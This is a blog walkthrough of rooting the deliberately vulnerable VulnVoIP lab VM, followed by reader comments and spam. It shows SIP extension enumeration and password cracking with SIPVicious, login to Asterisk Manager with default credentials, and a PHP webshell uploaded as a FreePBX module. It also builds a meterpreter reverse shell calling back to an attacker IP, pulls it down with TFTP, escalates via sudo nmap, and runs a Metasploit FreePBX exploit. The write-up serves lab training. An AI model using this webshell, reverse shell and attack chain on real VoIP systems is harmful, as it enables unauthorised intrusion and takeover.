As promised here we shall discuss a couple of ways to get root on VulnVoIP with some enumeration ‘fun’ in-between!
Assuming you’ve located the IP address, you can run a port scan and will find the following services listening (shortened for easy reference):
- 22/tcp open
- 53/tcp open domain
- 80/tcp open http
- 111/tcp open rpcbind
- 967/tcp open
- 3306/tcp open mysql
- 4445/tcp open
- 5038/tcp open asterisk
VoIP User Enumeration
In this demonstration I’m using SIPVicious to enumerate the SIP device/users and to help crack extension passwords.
The first thing to do is enumerate the end device. To do so we can use the command ./svmap.py –fingerprint 192.168.237.148
The next step is to locate valid SIP extensions. The initial command I used was ./svwar.py -D 192.168.237.148
As you can see no valid extensions are returned.
It’s possible to specify the method used in the request. In this particular instance the INVITE request brings back valid responses ./svwar.py -D -m INVITE 192.168.237.148
If all went well you should find that 6 extensions exist. The –D option used in the previous command just searches for default extensions, so it’s generally best to use a custom range. I also found that if I specified the extensions to scan, i.e. –e100-3000, only the lower extensions were found, hence it may be best to split up long scans.
Now that we’ve located extensions we really want to crack the associated passwords. Again SIPVicious can be used to perform this attack by using a command such as ./svcrack.py -u2000 -d passwords.txt 192.168.237.148
You might find that some extensions are easy to crack, others are a bit more testing! In this particular case, luckily, we have another unusual method of obtaining extension passwords.
Referring back to the port scan you can see that TCP port 5038 (Asterisk Call Manager) is open and available to external probes! If you performed a vulnerability scan this may have shown up stating that default credentials are in place.
It is possible to connect to the service using the telnet protocol on port 5038 with the default username admin and password amp111.
Using the command action with the actual command of sip show users it is possible to pull out a complete list of users, shown below:
The acm interface can also be used to locate voicemail users (useful for the next exercise!)
Note the ‘interesting’ information highlighted in the above image.
A thorough list of acm commands can be found here
Further Exploitation
As we’ve located a single user with voicemail capability, and we have the extension password, it is possible to use a soft-phone to log in with the credentials and attempt to gain access to the users voicemail inbox. For this particular example I’m using X-Lite.
Referencing Asterisk documentation it’s possible to see that *97 can be used to obtain voicemail. As we don’t know the voicemail password we’re going to have to bruteforce the manual way! Hint 0000 may get you in… In case you’re still struggling the voicemail goes along the lines of the following:
‘…Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123 all one word and lowercase. You can log on at the usual address. See you in the morning…’
After listening to the voicemail you should now have the username and password for the support account. To test these out navigate to the HTTP interface and enter the credentials support/securesupport123
Upon login you’ll be presented with the main administrative interface. A key piece of info is found in the FreePBX version details (research for vulnerabilities).
One particular vulnerability of interest can be found here, of which an extract follows:
- Create a directory such as: webshell
- Create a PHP file webshell, i.e. webshell.php
- Example.: <? if($_GET[‘cmd’]) { system($_GET[‘cmd’]); }?>
- Put this file into the webshell directory and create a tarball.
- This compressed file name needs to follow the given rule, i.e. name-version.tgz.
- The following command can be used to compress: tar -czvf webshell-1.0.tgz webshell/.
- Upload via the FreePBX modules interface
Using the webshell to perform a basic command (to ensure all is working as expected).
I used msfpayload to create a reverse shell for ease of access.
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.237.129 LPORT=4448 X > /root/vulnvoip/rev_shell.
The handler (exploit/multi/handler) was used to listen and wait for incoming connections.
TFTP can be used to upload the binary to the host using the PHP webshell as previously created, by using the command tftp *HOST_IP*-c get rev_shell.
Permissions of the uploaded file will need to be altered, i.e. chmod 777 rev_shell – not a great idea to use lax permissions like these in real life 😉
Upon gaining access via the Meterpreter shell it makes things easier (continue reading)…
Local Privilege Escalation
The usual tips and tricks work here. A little surprise is hidden in the sudoers file. Firstly we’ll need to locate the current user by issuing the command id which will show the user is asterisk. Issuing the command sudo -l will then identify the commands that asterisk can run as root.
The user asterisk can surprisingly run nmap as root! There’s a little trick here…
We’ve got root!
Exploitation – The Easy Way!
The following was covered in detail by Offensive Security and the write-up can be found here.
The version of FreePBX in use is vulnerable to an arbitrary remote code execution issue. Further details can be found at exploitDB and Securityfocus.
From the reported details it is possible to see that a Metasploit module exists, this being exploit/unix/http/freepbx_callmenum.
Set the relevant options (note, the extension we use for this either has to go to voicemail or the call needs to be answered). For this exploit we’re going to use the support extension. We’ll assume that we haven’t yet cracked user credentials to any extensions and, this being the only one with voicemail, leaves us with just one choice.
Exploit!
We have root shell. Now how cool and easy was that!
There are a few more funky things we can do with VulnVoIP, such as SIP spoofing. However we’ll cover that in a separate post and in the meantime have some fun!
something new for freepbx asterisk trixbox??
seems the web page for voicemail access is not working with the 2000 account, that’s why you used x-lite ?
Thanks for this – really enjoyed it!
Every time I try to login using telnet to port 5038 i see Call Manager but then anytime i type anything i receive “Response Error” and “Message missing action in request” I have tried SSh but dont know they actual login name
I am using backtrack 5 r3
root@BT# telnet 10.10.10.111 5037
Then the errors.
I even re-downloaded and installed into vmware workstation 9 Any idea??
Thanks
root@bt:~# telnet 10.10.10.111 5038
Trying 10.10.10.111…
Connected to 10.10.10.111.
Escape character is ‘^]’.
Asterisk Call Manager/1.1
Response: Error
Message: Missing action in request
This is my error, the VM is using bridged mode at 10.10.10.111 I am at 10.10.10.109. I can ping it, accesss it from the web page but cannot login the damn thing to i can create and upload the PHP file. Any ideas on this?
Does anyone just know the web-admin login. Then I can continue on. Thanks
Hellow Owen
I need so much to the username and password when I start the image about VMWare, and just you can help me!
Please can i try to finish my work with sucess!!
Very Thanks!!!
Guys, just to reiterate, the root password is not needed/given. The idea of this challenge is to crack the box and gain access. The solutions post should help you achieve this.
After opening the VulnVOIP in vmware then how will i get the IP adress of vulnVOIP machine for scanning from nmap.
Hi
plz what is default password of trixbox and freepbx ?
Hello, there is no port 5038 running on the VulnVoip instance. What gives?
VoIP Solution Provider
VoIP Solution Provider, Softswitch as s Service (SaaS), VoIP termination provider, VoIP Pinless POS, Callshop Software, VoIP Carrier, Softswitch.Clouds SoftSwitch ® VoIP in the Cloud VoIP Billing SIP Server IAX2 Calling Cards Callback VoIP Resellers SIP Mobile Dialers Callshop Billing Telecom Automation more
Clouds SoftSwitch ® VoIP in the Cloud VoIP Billing SIP Server IAX2 Calling Cards Callback VoIP Resellers SIP Mobile Dialers Callshop Billing Telecom Automation more
Another way to gain root without any exploit for a FreePBX box, only taking advantage of a bad configuration:
http://blog.pepelux.org/2014/10/29/jugando-con-vulnvoip/
Pingback: Action Voip Domain Name | You Conference Call
Pingback: Best Voip Solutions | Home
Pingback: Voip Dialers |
Pingback: Best Voip Solutions | autoqoute.com
Btw there is a trophy.txt in the root directory.
Reb00tu53r